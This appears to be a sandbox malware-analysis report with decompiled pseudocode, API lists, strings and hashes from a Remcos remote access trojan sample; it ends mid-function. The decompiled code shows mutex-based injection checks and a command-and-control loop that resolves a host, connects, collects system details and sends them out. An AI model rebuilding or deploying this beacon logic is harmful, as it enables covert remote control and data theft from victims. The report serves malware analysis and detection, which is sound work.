										CreateThread(_t269, _t269, E0040FFE5, _t269, _t269, _t269);
									}
									_t165 =  *0x46a9d0; // 0x1
									_t166 = _t165 - _t269;
									__eflags = _t166;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t166 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t224 = E00401E49(0x46c578, "0", __eflags, 0xd);
									_t506 = _t501 - 0x18;
									_t449 = _t224;
									E004172DA(_t506, _t224);
									_t226 = E0040CE44(__eflags);
									_t501 = _t506 + 0x18;
									__eflags = _t226 - _t272;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t272 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t265 = E00410885(E00401F95(0x46c518), "WD",  &_v780);
						__eflags = _t265;
						if(_t265 != 0) {
							E00410CE2(E00401F95(0x46c518), __eflags, "WD");
							E0040FD95();
							L71:
							_push("User");
							L72:
							E004075C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E00402084(_t269,  &_v776));
							E00402084(_t269, _t497 - 4, "[Info]");
							E00416C80(_t269, _t461);
							_t360 =  &_v784;
							E00401FC7(); // executed
							L73:
							E00411929(); // executed
							asm("int3");
							_push(_t471);
							_t481 = _t360 + 0x68;
							E0040D515(_t269, _t481, _t481);
							_t284 = _t481;
							 *_t284 = 0x460788;
							 *_t284 = 0x460744;
							return E004304F6(_t284);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E0040D544( &_v700, __edx, __eflags, "license_code.txt", 2);
							__ecx = 0x46c578;
							__ecx = E00401E49(0x46c578, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = E0040E8BB( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E0040D4F5( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							E00401FC7() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t97;
						}
					}
				}
			}

0x0040c2be
0x0040c2d4
0x0040c2d9
0x0040c2dc
0x0040c2e1
0x0040c2eb
0x0040c2f0
0x0040c2fa
0x0040c303
0x0040c308
0x0040c30c
0x0040c315
0x0040c31a
0x0040c320
0x0040c387
0x0040c387
0x0040c3a5
0x0040c3a8
0x0040c3ca
0x0040c3d0
0x0040c3d8
0x0040c3e1
0x0040c3ea
0x0040c3f9
0x0040c3fe
0x0040c405
0x0040c416
0x0040c418
0x0040c41f
0x0040c426
0x0040c42b
0x0040c42d
0x0040c434
0x0040c43a
0x0040c462
0x0040c46d
0x0040c477
0x0040c479
0x0040c47b
0x0040c483
0x0040c48a
0x0040c48a
0x0040c4a7
0x0040c4a9
0x0040c4b0
0x0040c4b2
0x0040c4bc
0x0040c4be
0x0040c4c3
0x0040c4d5
0x0040c4dc
0x0040c4e4
0x0040c4e6
0x0040c4e9
0x0040c4ef
0x0040c4f5
0x0040c4fa
0x0040c87d
0x0040c881
0x0040c886
0x00000000
0x0040c500
0x0040c500
0x0040c510
0x0040c516
0x0040c51b
0x0040c526
0x0040c52b
0x0040c534
0x0040c539
0x0040c544
0x0040c54d
0x0040c552
0x0040c55b
0x0040c564
0x0040c55d
0x0040c55d
0x0040c55d
0x0040c569
0x0040c56e
0x0040c573
0x0040c575
0x0040c579
0x0040c579
0x0040c57e
0x0040c583
0x0040c587
0x0040c592
0x0040c599
0x0040c59c
0x0040c59e
0x0040c5a4
0x0040c5a6
0x0040c5ac
0x0040c5d0
0x0040c5d2
0x0040c5d7
0x0040c5d8
0x0040c5da
0x0040c5dc
0x0040c5dc
0x0040c5ae
0x0040c5ae
0x0040c5af
0x0040c5b5
0x0040c5b8
0x0040c5ba
0x0040c5ba
0x0040c5b8
0x0040c5ac
0x0040c5a4
0x0040c59c
0x0040c5f1
0x0040c5f4
0x0040c5f6
0x0040c5f6
0x0040c611
0x0040c62a
0x0040c62d
0x0040c644
0x0040c647
0x0040c65e
0x0040c661
0x0040c674
0x0040c677
0x0040c684
0x0040c689
0x0040c689
0x0040c68c
0x0040c68c
0x0040c68f
0x0040c692
0x0040c692
0x0040c697
0x0040c69b
0x0040c6a8
0x0040c6bd
0x0040c6c2
0x0040c6d5
0x0040c6de
0x0040c6e3
0x0040c6e3
0x0040c69b
0x0040c6e8
0x0040c6ec
0x0040c89c
0x0040c8ab
0x0040c8b3
0x0040c8d1
0x0040c8d3
0x0040c8d8
0x0040c8e8
0x0040c8ed
0x00000000
0x0040c6f2
0x0040c6f2
0x0040c6f9
0x0040c78f
0x0040c6ff
0x0040c70a
0x0040c71c
0x0040c731
0x0040c736
0x0040c73e
0x0040c744
0x0040c75c
0x0040c776
0x0040c77d
0x0040c780
0x0040c781
0x0040c781
0x0040c799
0x0040c7a3
0x0040c7ab
0x0040c7ad
0x0040c7ae
0x0040c7b7
0x0040c7ba
0x0040c7bc
0x0040c7ce
0x0040c7be
0x0040c7c4
0x0040c7c9
0x0040c7c9
0x0040c7d5
0x0040c7de
0x0040c7de
0x0040c7e0
0x0040c7e1
0x0040c7e1
0x0040c7e4
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ef
0x0040c7f7
0x0040c7ff
0x0040c80a
0x0040c829
0x0040c82f
0x0040c834
0x0040c837
0x0040c840
0x0040c845
0x0040c851
0x0040c853
0x0040c8f2
0x0040c8f2
0x0040c8fe
0x0040c903
0x0040c909
0x0040c90e
0x0040c91d
0x0040c91f
0x0040c924
0x0040c938
0x0040c943
0x0040c949
0x0040c94b
0x0040c951
0x0040c953
0x0040c955
0x0040c955
0x00000000
0x0040c955
0x0040c94d
0x0040c94d
0x0040c957
0x0040c957
0x0040c95c
0x0040c968
0x0040c968
0x0040c975
0x0040c987
0x0040c999
0x0040c99e
0x0040c9a3
0x0040c9c0
0x0040c9d2
0x0040c9f1
0x0040ca09
0x0040ca0b
0x0040ca54
0x0040ca0d
0x0040ca0f
0x0040ca16
0x0040ca22
0x0040ca29
0x0040ca2b
0x0040ca30
0x0040ca36
0x0040ca48
0x0040ca4b
0x0040ca4d
0x0040ca4d
0x0040ca6a
0x0040ca6c
0x0040ca70
0x0040ca77
0x0040ca81
0x0040ca88
0x0040ca8a
0x0040ca8f
0x0040ca95
0x0040caa1
0x0040caa4
0x0040caa6
0x0040caa6
0x0040cabb
0x0040cabd
0x0040cac3
0x0040cad0
0x0040cae5
0x0040caea
0x0040cafd
0x0040cb06
0x0040cb0b
0x0040cb17
0x0040cb19
0x0040cb19
0x0040cb2e
0x0040cb30
0x0040cb49
0x0040cb58
0x0040cb5d
0x0040cb60
0x0040cb63
0x0040cb66
0x0040cb66
0x0040cb6f
0x0040cb7a
0x0040cb7f
0x0040cb83
0x0040cb88
0x0040cb8d
0x0040cb8f
0x0040cb91
0x0040cb94
0x0040cb94
0x0040cba0
0x0040cba2
0x0040cba9
0x0040cbb5
0x0040cbb5
0x0040cbb7
0x0040cbbe
0x0040cbca
0x0040cbca
0x0040cbcc
0x0040cbd1
0x0040cbd1
0x0040cbd3
0x00000000
0x0040cbd5
0x0040cbd5
0x0040cbd8
0x0040cbda
0x00000000
0x0040cbda
0x0040cbd8
0x00000000
0x0040c859
0x0040c85d
0x0040c862
0x0040c865
0x0040c869
0x0040c86e
0x0040c873
0x0040c876
0x0040c878
0x00000000
0x0040c87a
0x0040c87c
0x00000000
0x0040c87c
0x0040c878
0x0040c853
0x0040c6ec
0x0040c43c
0x0040c440
0x0040c453
0x0040c45a
0x0040c45c
0x0040cbef
0x0040cbf9
0x0040cbfe
0x0040cbfe
0x0040cc03
0x0040cc17
0x0040cc26
0x0040cc2b
0x0040cc33
0x0040cc37
0x0040cc3c
0x0040cc3c
0x0040cc41
0x0040cc42
0x0040cc43
0x0040cc48
0x0040cc4d
0x0040e032
0x0040c177
0x0040c183
0x00000000
0x00000000
0x00000000
0x0040c45c
0x0040c322
0x0040c322
0x0040c326
0x00000000
0x0040c328
0x0040c328
0x0040c32c
0x0040c32e
0x00000000
0x0040c330
0x0040c330
0x0040c331
0x0040c339
0x0040c33d
0x0040c344
0x0040c34e
0x0040c355
0x0040c357
0x0040c35b
0x0040c360
0x0040c364
0x0040c369
0x0040c36d
0x0040c372
0x0040c37b
0x0040c37d
0x0040c37d
0x0040c37e
0x0040c384
0x0040c384
0x0040c32e
0x0040c326

APIs

OpenMutexA.KERNEL32 ref: 0040C471
WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C483
CloseHandle.KERNEL32(00000000), ref: 0040C48A
CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C4E9
GetLastError.KERNEL32 ref: 0040C4EF
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\DpiScaling.exe,00000104), ref: 0040C510

Part of subcall function 0040E8BB: __EH_prolog.LIBCMT ref: 0040E8C0

Strings

origmsc, xrefs: 0040C5C1
ProductName, xrefs: 0040C51C
Access level: , xrefs: 0040CC0F
Inj, xrefs: 0040C494, 0040C49F, 0040C4B4
(64 bit), xrefs: 0040C55D
license_code.txt, xrefs: 0040C334
Remcos, xrefs: 0040C60C
licence, xrefs: 0040C90E
[Info], xrefs: 0040CC21
C:\Windows\SysWOW64\DpiScaling.exe, xrefs: 0040C50A, 0040C785
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040C521
Exe, xrefs: 0040C3EF
Sept-AITAB5, xrefs: 0040C4CD
User, xrefs: 0040CBFE
exepath, xrefs: 0040C81D, 0040C8C7
Remcos_Mutex_Inj, xrefs: 0040C462
(32 bit), xrefs: 0040C564
Software\, xrefs: 0040C3B5
Administrator, xrefs: 0040CBDA
Exe, xrefs: 0040C3F4

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\DpiScaling.exe$Exe$Exe$Inj$ProductName$Remcos$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Sept-AITAB5$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
API String ID: 1247502528-626796739
Opcode ID: 4b207ed638967b4401ac86fe367ff117de20b2f704d0ea2f0959e07d27e19a7d
Instruction ID: 97ecaa49e5e083256040f844ff0fd3ae96e39466cf8f0e182fdc5e320802d438
Opcode Fuzzy Hash: 4b207ed638967b4401ac86fe367ff117de20b2f704d0ea2f0959e07d27e19a7d
Instruction Fuzzy Hash: 5432F460B443516BDA1577729CA6B3F26898B8170CF04053FB542BB2E3EE7C9D4583AE

Uniqueness

Uniqueness Score: -1.00%

Function 00411929, Relevance: 30.5, APIs: 6, Strings: 11, Instructions: 743
sleepnetworkthreadCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00411929() {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v20;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v140;
				void* _v163;
				char _v164;
				char _v188;
				char _v212;
				char _v236;
				char _v260;
				char _v284;
				char _v308;
				char _v332;
				char _v356;
				char _v380;
				char _v404;
				char _v428;
				char _v452;
				char _v476;
				char _v500;
				char _v524;
				char _v548;
				char _v572;
				char _v596;
				char _v620;
				char _v644;
				char _v668;
				char _v692;
				char _v716;
				char _v740;
				char _v764;
				char _v788;
				char _v812;
				char _v836;
				char _v860;
				char _v884;
				char _v908;
				char _v932;
				char _v956;
				char _v980;
				char _v1004;
				char _v1028;
				char _v1052;
				char _v1076;
				char _v1100;
				char _v1124;
				char _v1148;
				char _v1172;
				char _v1196;
				char _v1220;
				char _v1244;
				char _v1268;
				char _v1292;
				char _v1316;
				char _v1340;
				char _v1364;
				char _v1388;
				char _v1412;
				char _v1436;
				char _v2436;
				signed int _t166;
				void* _t168;
				long _t172;
				void* _t174;
				signed char _t178;
				void* _t184;
				short _t195;
				void* _t197;
				void* _t198;
				void* _t200;
				long _t204;
				short _t209;
				void* _t210;
				void* _t212;
				void* _t225;
				void* _t233;
				void* _t234;
				void* _t237;
				intOrPtr* _t238;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t246;
				void* _t248;
				void* _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;
				void* _t256;
				void* _t257;
				void* _t258;
				intOrPtr* _t353;
				void* _t367;
				void* _t369;
				void* _t371;
				void* _t373;
				void* _t375;
				long _t379;
				void* _t380;
				void* _t381;
				char* _t401;
				void* _t616;
				void* _t625;
				void* _t677;
				signed short _t681;
				struct _SECURITY_ATTRIBUTES* _t684;
				void* _t694;
				void* _t695;
				void* _t696;
				void* _t697;
				void* _t698;
				void* _t699;
				void* _t700;
				void* _t701;
				void* _t703;
				void* _t704;
				void* _t708;
				void* _t709;
				void* _t710;
				void* _t711;
				void* _t712;
				long _t714;

				_push(_t380);
				E004020D5(_t380,  &_v104);
				E00416FDC( &_v236, _t616);
				E004020D5(_t380,  &_v1436);
				_t677 = 0x46c578;
				_t166 = E00436769(_t164, E00401F95(E00401E49(0x46c578, _t616, _t712, 0x29)));
				if(_t166 != 0) {
					_t379 = _t166 * 0x3e8;
					_t714 = _t379;
					Sleep(_t379);
				}
				_t695 = _t694 - 0x18;
				E00402084(_t380, _t695, 0x4657ec);
				_t168 = E00401E49(_t677, _t616, _t714, 0);
				_t696 = _t695 - 0x18;
				E004020EC(_t380, _t696, _t616, _t714, _t168);
				E00417478( &_v32, _t616);
				_t697 = _t696 + 0x30;
				_t684 = 0;
				_v8 = 0;
				_t381 = 0;
				E00401E49(_t677, _t616, _t714, 0x3a);
				_t617 = 0x45f6bc;
				_t172 = E0040EAD9(_t714);
				_t715 = _t172;
				if(_t172 != 0) {
					E00401E49(_t677, 0x45f6bc, _t715, 0x3a);
					_t367 = E00402489();
					_t369 = E00401F95(E00401E49(_t677, 0x45f6bc, _t715, 0x3a));
					E00401E49(_t677, 0x45f6bc, _t715, 0x39);
					_t371 = E00402489();
					_t373 = E00401F95(E00401E49(_t677, _t617, _t715, 0x39));
					E00401E49(_t677, _t617, _t715, 0x38);
					_t375 = E00402489();
					E00401F95(E00401E49(_t677, _t617, _t715, 0x38));
					_t617 = _t375;
					E00404882(_t375, _t373, _t371, _t369, _t367); // executed
					_t697 = _t697 + 0x10;
					_t684 = 0;
				}
				L4:
				_t698 = _t697 - 0x18;
				E00402084(_t381, _t698, 0x4657f0);
				_t174 = E00401E49( &_v32, _t617, _t715, _t381);
				_t699 = _t698 - 0x18;
				E004020EC(_t381, _t699, _t617, _t715, _t174);
				E00417478( &_v20, _t617);
				_t697 = _t699 + 0x30;
				E00401E49( &_v20, _t617, _t715, 2);
				_t618 = "0";
				_t178 = E00405A6F("0");
				asm("sbb al, al");
				 *0x46bae0 =  ~_t178 + 1;
				E0040498B(0x46c780);
				if(_t684 >= 0 || E004021F5( &_v32) > 1) {
					_t718 =  *0x46c781 - 1;
					_t401 =  &_v104;
					if( *0x46c781 != 1) {
						_push(0x45f6bc);
					} else {
						_push(" (TLS)");
					}
					E00405A0B(_t381, _t401);
					_t700 = _t697 - 0x18;
					_t184 = E00401E49( &_v20, _t618, _t718, 1);
					_t617 = E00402F93(_t381,  &_v128, E00405343(_t381,  &_v56, E004075E6( &_v80, "Connecting to ", _t718, E00401E49( &_v20, _t618, _t718, 0)), _t677, _t718, 0x4657f0), _t718, _t184);
					E00402F93(_t381, _t700, _t188, _t718,  &_v104);
					_t701 = _t700 - 0x14;
					E00402084(_t381, _t701, "[Info]");
					E00416C80(_t381, _t677);
					_t697 = _t701 + 0x30;
					E00401FC7();
					E00401FC7();
					E00401FC7();
					_t684 = _v8;
				}
				_t195 = 2;
				 *0x46bacc = _t195;
				_t197 = E00401F95(E00401E49( &_v20, _t617, _t718, 0));
				__imp__#52(_t197); // executed
				_t719 = _t197;
				if(_t197 != 0) {
					E004324E0(0x46bad0,  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0xc)))),  *((short*)(_t197 + 0xa)));
					_t209 = E00436769(_t207, E00401F95(E00401E49( &_v20, _t617, _t719, 1)));
					__imp__#9();
					_t697 = _t697 + 0xc - 0x10;
					 *0x46bace = _t209;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t210 = E00404A08(_t617, _t209); // executed
					_t720 = _t210;
					if(_t210 != 0) {
						_t703 = _t697 - 0x18;
						_t212 = E00401E49( &_v20, _t617, _t720, 1);
						_t625 = E00402F93(_t381,  &_v56, E00405343(_t381,  &_v188, E004075E6( &_v212, "Connected to  ", _t720, E00401E49( &_v20, _t617, _t720, 0)), 0x46c780, _t720, 0x4657f0), _t720, _t212);
						E00402F93(_t381, _t703, _t625, _t720,  &_v104);
						_t704 = _t703 - 0x14;
						E00402084(_t381, _t704, "[Info]");
						E00416C80(_t381, 0x46c780);
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00404E9A(0x46c780, 0xa, 0); // executed
						_v164 = 0;
						asm("stosd");
						_v8 = 1;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd"); // executed
						_t225 = E00416EFA(0x46c780); // executed
						_push(_t625);
						E00411912( &_v164, "%I64u", _t225);
						E00407350(_t381,  &_v128, _t625, _t720, 0x46c3b0);
						E0043BACE( &_v128,  *0x46a9d0,  &_v140, 0xa);
						E004020EC(_t381,  &_v80, _t625, _t720, E00401E49(0x46c578, _t625, _t720, 1));
						_t233 = E00402489();
						_t234 = E00401F95(0x46c560);
						_t237 = E00410A30(E00401F95(0x46c518), "name",  &_v2436, 0x104, _t234, _t233); // executed
						_t708 = _t704 + 0x60;
						if(_t237 != 0) {
							E00405A0B(_t381,  &_v80,  &_v2436);
						}
						_t238 =  *0x46bd44; // 0x0
						_t681 = 0;
						_t722 = _t238;
						if(_t238 != 0) {
							_t681 =  *_t238() & 0x0000ffff;
						}
						E0040427F(_t381,  &_v56, "C:\Windows\SysWOW64\DpiScaling.exe");
						_t709 = _t708 - 0x18;
						_t241 = E0041739C(_t381,  &_v1412, 0x46c500);
						_t242 = E00417226(_t381,  &_v1388, _t681 & 0x0000ffff);
						_t243 = E00401E49( &_v20, _t681 & 0x0000ffff, _t722, 0);
						_t246 = E00417226(_t381,  &_v1364, GetTickCount());
						_t248 = E00417226(_t381,  &_v1340, E004171D6( &_v1364));
						_t250 = E0041719C( &_v1316); // executed
						_t251 = E0041739C(_t381,  &_v1292, _t250);
						_t252 = E0041739C(_t381,  &_v1268, 0x46c0e0);
						_t253 = E0041739C(_t381,  &_v1244,  &_v56);
						_t254 = E0041739C(_t381,  &_v1220,  &_v128);
						_t256 = E0041739C(_t381,  &_v1196, 0x46c880);
						_t257 = E0040D1E5( &_v1172);
						_t258 = E0041739C(_t381,  &_v1148, 0x46c584);
						_t617 = E00402F93(_t381,  &_v212, E00402F93(_t381,  &_v188, E00402F93(_t381,  &_v260, E00402F1D( &_v284, E00402F93(_t381,  &_v308, E00402F1D( &_v332, E00402F93(_t381,  &_v356, E00402F93(_t381,  &_v380, E00402F93(_t381,  &_v404, E00402F93(_t381,  &_v428, E00402F93(_t381,  &_v452, E00405343(_t381,  &_v476, E00402F93(_t381,  &_v500, E00402F1D( &_v524, E00402F93(_t381,  &_v548, E00402F1D( &_v572, E00402F93(_t381,  &_v596, E0040759C(_t381,  &_v620, E00402F93(_t381,  &_v644, E00402F1D( &_v668, E00402F93(_t381,  &_v692, E00402F1D( &_v716, E00402F93(_t381,  &_v740, E00402F1D( &_v764, E00402F93(_t381,  &_v788, E00402F1D( &_v812, E00402F93(_t381,  &_v836, E00405343(_t381,  &_v860, E00402F93(_t381,  &_v884, E00405343(_t381,  &_v908, E00402F93(_t381,  &_v932, E00402F1D( &_v956, E00402F93(_t381,  &_v980, E00402F93(_t381,  &_v1004, E00402F93(_t381,  &_v1028, E00402F1D( &_v1052, E00402F93(_t381,  &_v1076, E00402F1D( &_v1100, E00402FB7( &_v1124,  &_v80, 0x46c238), _t258), _t722, 0x46c238), _t257), _t722, 0x46c238), _t722, 0x46c5b4), _t722, 0x46c238), _t256), _t722, 0x46c238), 0x46c238, _t722,  &_v164), _t722, 0x46c238), 0x46c238, _t722, "3.2.1 Pro"), _t722, 0x46c238), _t254), _t722, 0x46c238), _t253), _t722, 0x46c238), _t252), _t722, 0x46c238), _t251), _t722, 0x46c238), 0x46c238, _t722,  *0x46a9d4 & 0x000000ff), _t722, 0x46c238), _t248), _t722, 0x46c238), _t246), _t722, 0x46c238), 0x46c238, _t722,  &_v140), _t722, 0x46c238), _t722, _t243), _t722, 0x46c238), _t722, "Sept-AITAB5"), _t722, 0x46c238), _t242), _t722, 0x46c238), _t241), _t722, 0x46c238), _t722,  &_v236), _t722, 0x46c238);
						E00402F93(_t381, _t709, _t297, _t722, "Exe");
						_push(0x4b);
						E00404AA4(_t381, 0x46c780, _t297, _t722); // executed
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401EF0();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401FC7();
						E00401EF0();
						E00404BBE(0x46c780, _t297, E004123B9, 1);
						_t353 =  *0x46bd48; // 0x0
						if(_t353 != 0 &&  *0x46bd4d != 0) {
							_t353 =  *_t353();
							 *0x46bd4d = 0;
						}
						if( *0x46c39a != 0) {
							_t353 = E0040951E(_t381, 0x46c350);
						}
						E004059C5(_t353);
						_t710 = _t709 - 0x18;
						E00402084(_t381, _t710, "Disconnected!");
						_t711 = _t710 - 0x18;
						E00402084(_t381, _t711, "[Info]");
						E00416C80(_t381, 0x46c238);
						_t697 = _t711 + 0x30;
						if( *0x46bea4 != 0) {
							CreateThread(0, 0, E0041667F, 0, 0, 0);
						}
						E00401FC7();
						E00401EF0();
					}
					_t684 = _v8;
					_t677 = 0x46c578;
				}
				_t684 = _t684 - 1;
				_v8 = _t684;
				_t381 = _t381 + 1;
				_t198 = E004021F5( &_v32);
				_t728 = _t381 - _t198;
				if(_t381 >= _t198) {
					_t200 = 2;
					_t381 = 0;
					_t204 = E00436769(_t201, E00401F95(E00401E49(_t677, _t617, _t728, _t200))) * 0x3e8;
					_t715 = _t204;
					Sleep(_t204);
				}
				E00401E74( &_v20, _t617);
				goto L4;
			}

0x00411935
0x00411938
0x00411943
0x0041194e
0x00411953
0x00411969
0x00411971
0x00411973
0x00411973
0x0041197a
0x0041197a
0x00411980
0x0041198a
0x00411993
0x00411998
0x0041199e
0x004119a6
0x004119ab
0x004119ae
0x004119b2
0x004119b5
0x004119b9
0x004119be
0x004119c5
0x004119ca
0x004119cc
0x004119d2
0x004119d9
0x004119ea
0x004119f4
0x004119fb
0x00411a0c
0x00411a16
0x00411a1d
0x00411a2f
0x00411a34
0x00411a38
0x00411a3d
0x00411a40
0x00411a40
0x00411a42
0x00411a42
0x00411a4c
0x00411a55
0x00411a5a
0x00411a60
0x00411a68
0x00411a6d
0x00411a75
0x00411a7a
0x00411a81
0x00411a8d
0x00411a91
0x00411a96
0x00411a9d
0x00411ab0
0x00411ab7
0x00411aba
0x00411ac3
0x00411abc
0x00411abc
0x00411abc
0x00411ac8
0x00411acd
0x00411adb
0x00411b15
0x00411b19
0x00411b1e
0x00411b28
0x00411b2d
0x00411b32
0x00411b38
0x00411b40
0x00411b48
0x00411b4d
0x00411b4d
0x00411b52
0x00411b58
0x00411b65
0x00411b6b
0x00411b71
0x00411b73
0x00411b88
0x00411ba2
0x00411ba9
0x00411baf
0x00411bb2
0x00411bbf
0x00411bc0
0x00411bc1
0x00411bc2
0x00411bca
0x00411bcf
0x00411bd1
0x00411bd7
0x00411be5
0x00411c25
0x00411c29
0x00411c2e
0x00411c38
0x00411c3d
0x00411c48
0x00411c53
0x00411c5e
0x00411c69
0x00411c6e
0x00411c7f
0x00411c81
0x00411c84
0x00411c85
0x00411c86
0x00411c87
0x00411c88
0x00411c8d
0x00411c9b
0x00411cab
0x00411cbf
0x00411cd6
0x00411ce2
0x00411cea
0x00411d0d
0x00411d12
0x00411d17
0x00411d23
0x00411d23
0x00411d28
0x00411d2d
0x00411d2f
0x00411d31
0x00411d35
0x00411d35
0x00411d40
0x00411d45
0x00411d68
0x00411d7c
0x00411d93
0x00411db0
0x00411dc4
0x00411dda
0x00411de7
0x00411df9
0x00411e09
0x00411e19
0x00411e39
0x00411e4c
0x00411e5e
0x00412088
0x0041208c
0x00412097
0x0041209b
0x004120a6
0x004120b1
0x004120bc
0x004120c7
0x004120d2
0x004120dd
0x004120e8
0x004120f3
0x004120fe
0x00412109
0x00412114
0x0041211f
0x0041212a
0x00412135
0x00412140
0x0041214b
0x00412156
0x00412161
0x0041216c
0x00412177
0x00412182
0x0041218d
0x00412198
0x004121a3
0x004121ae
0x004121b9
0x004121c4
0x004121cf
0x004121da
0x004121e5
0x004121f0
0x004121fb
0x00412206
0x00412211
0x0041221c
0x00412227
0x00412232
0x0041223d
0x00412248
0x00412253
0x0041225e
0x00412269
0x00412274
0x0041227f
0x0041228a
0x00412295
0x004122a0
0x004122ab
0x004122b6
0x004122c1
0x004122cc
0x004122d4
0x004122e2
0x004122e7
0x004122ee
0x004122f9
0x004122fb
0x004122fb
0x00412309
0x00412310
0x00412310
0x00412315
0x0041231a
0x00412324
0x00412329
0x00412333
0x00412338
0x0041233d
0x00412347
0x00412355
0x00412355
0x0041235e
0x00412366
0x00412366
0x0041236b
0x0041236e
0x0041236e
0x00412373
0x00412377
0x0041237a
0x0041237b
0x00412380
0x00412382
0x00412386
0x0041238a
0x0041239e
0x0041239e
0x004123a6
0x004123a6
0x004123af
0x00000000

APIs

Sleep.KERNEL32(00000000,00000029,73B743E0,0046C578,00000000), ref: 0041197A

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

gethostbyname.WS2_32(00000000), ref: 00411B6B
htons.WS2_32(00000000), ref: 00411BA9
Sleep.KERNEL32(00000000,00000002), ref: 004123A6

Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70

GetTickCount.KERNEL32 ref: 00411DA2

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

CreateThread.KERNEL32(00000000,00000000,Function_0001667F,00000000,00000000,00000000), ref: 00412355

Strings

Connecting to , xrefs: 00411AF1
%I64u, xrefs: 00411C95
[Info], xrefs: 00411B23, 00411C33, 0041232E
C:\Windows\SysWOW64\DpiScaling.exe, xrefs: 00411D38
(TLS), xrefs: 00411ABC
Sept-AITAB5, xrefs: 00411D8B
3.2.1 Pro, xrefs: 00411E20
Disconnected!, xrefs: 0041231F
name, xrefs: 00411D01
Exe, xrefs: 00411D5A
Connected to , xrefs: 00411BFB

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
String ID: (TLS)$%I64u$3.2.1 Pro$C:\Windows\SysWOW64\DpiScaling.exe$Connected to $Connecting to $Disconnected!$Exe$Sept-AITAB5$[Info]$name
API String ID: 2130001850-3324633824
Opcode ID: aac4903dc12f3f0f4b876898df669f584e53baf1360f70ef9831274f7dbc6615
Instruction ID: c8c226d7e30845bf2bb3d2e67be1d86719b60e177ee7695842f0b4eb2dcf0a18
Opcode Fuzzy Hash: aac4903dc12f3f0f4b876898df669f584e53baf1360f70ef9831274f7dbc6615
Instruction Fuzzy Hash: ED427A31A102155BCB18F762DD56AEEB375AF50308F5001BFB40AB61E2EF785F858E89

Uniqueness

Uniqueness Score: -1.00%

Function 0041805B, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041805B(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
